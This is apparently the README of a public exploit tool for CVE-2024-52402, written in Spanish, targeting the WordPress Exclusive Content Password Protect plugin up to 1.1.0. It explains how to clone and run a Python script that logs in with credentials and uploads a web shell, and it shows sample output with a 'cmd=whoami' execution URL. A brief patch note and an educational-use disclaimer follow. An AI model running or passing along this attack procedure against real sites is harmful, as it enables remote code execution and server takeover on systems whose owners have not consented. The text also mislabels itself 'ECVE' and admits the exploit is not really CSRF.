
WordPress Exclusive Content Password Protect plugin <= 1.1.0 - Vulnerabilidad de CSRF a Subida Arbitraria de Archivos
Este exploit apunta a una vulnerabilidad de Cross-Site Request Forgery (CSRF) en el plugin Exclusive Content Password Protect de WordPress, en versiones hasta la 1.1.0 inclusive. Esta vulnerabilidad permite a un atacante subir una web shell al servidor web, lo que puede derivar en la ejecución remota de código.
Para explotar esta vulnerabilidad, debes proporcionar la URL del sitio WordPress objetivo, un nombre de usuario válido de WordPress y la contraseña. El script de exploit iniciará sesión en el sitio WordPress e intentará subir una web shell.
python CVE-2024-52402.py -u <target> -un <username> -p <password>
usage: CVE-2024-52402.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit for ECVE-2024-52402 By | Nxploit, Khaled ALenazi
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL
-un, --username USERNAME
WordPress username
-p, --password PASSWORD
WordPress password
python CVE-2024-52402.py -u http://target/wordpress -un admin -p admin
[+] Plugin version detected: 1.1.0
[+] Logged in successfully.
[!] Exploit completed! Web Shell uploaded: http://target/wordpress/wp-content/uploads/nxploit.php
[*] Test with: http://target/wordpress/wp-content/uploads/nxploit.php?cmd=whoami
Este script explota la vulnerabilidad CSRF en el plugin Exclusive Content Password Protect para subir una web shell al servidor WordPress. Sin embargo, no ejecuta un ataque CSRF directamente; en cambio, se centra en aprovechar la funcionalidad de subida de archivos del plugin para lograr la explotación.
Clonar el repositorio
git clone https://github.com/Nxploited/CVE-2024-52402.git
cd CVE-2024-52402
Instalar los requisitos
Asegúrate de tener instalada la librería requests:
pip install requests
Ejecutar el script Usa el siguiente comando para ejecutar el script:
python CVE-2024-52402.py -u http://target/wordpress -un admin -p admin
Para mitigar esta vulnerabilidad, actualiza el plugin Exclusive Content Password Protect a la última versión donde este problema ha sido corregido.
Este script está destinado únicamente a fines educativos. El uso no autorizado de este script contra sistemas para los que no tienes permiso explícito de prueba es ilegal y poco ético.
Exploit By: Nxploit , Khaled alenazi.